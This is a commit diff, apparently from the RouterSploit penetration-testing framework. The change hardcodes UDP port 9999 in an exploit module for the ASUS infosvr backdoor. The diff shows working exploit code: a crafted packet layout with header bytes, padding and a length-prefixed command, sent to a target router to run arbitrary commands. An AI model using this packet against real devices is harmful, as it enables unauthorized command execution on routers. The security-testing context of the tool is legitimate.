Fixing port option - static 9999.

3a7b8941 · Marcin Bury · 6941fb47 · 3a7b8941
Commit 3a7b8941 authored Apr 20, 2016 by Marcin Bury
Hide whitespace changes
Inline Side-by-side

Showing with 3 additions and 4 deletions

infosvr_backdoor_rce.py routersploit/modules/exploits/asus/infosvr_backdoor_rce.py +3 -4

No files found.
--- a/routersploit/modules/exploits/asus/infosvr_backdoor_rce.py
+++ b/routersploit/modules/exploits/asus/infosvr_backdoor_rce.py
@@ -44,7 +44,6 @@ class Exploit(exploits.Exploit):
    }

    target = exploits.Option('', 'Target address e.g. 192.168.1.1')
-    port = exploits.Option(9999, 'Target Port')

    def run(self):
        try:
@@ -56,7 +55,7 @@ class Exploit(exploits.Exploit):
            else:
                print_error("Target is not vulnerable")
        except socket.error as ex:
-            print_error("Socket error ({ex}). It most likely means that something else is listening locally on port UDP:{port}. Make sure to kill it before running the exploit again.".format(ex=ex, port=self.port))
+            print_error("Socket error ({ex}). It most likely means that something else is listening locally on port UDP:{port}. Make sure to kill it before running the exploit again.".format(ex=ex, port=9999))

    def command_loop(self):
        while 1:
@@ -72,12 +71,12 @@ class Exploit(exploits.Exploit):
            return

        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
-        sock.bind(('0.0.0.0', self.port))
+        sock.bind(('0.0.0.0', 9999))
        sock.settimeout(2)

        packet = (b'\x0C\x15\x33\x00'+ os.urandom(4) + (b'\x00' * 38) + struct.pack('<H', len(cmd)) + cmd).ljust(512, b'\x00')

-        sock.sendto(packet, (self.target, self.port))
+        sock.sendto(packet, (self.target, 9999))
        
        while True:
            try: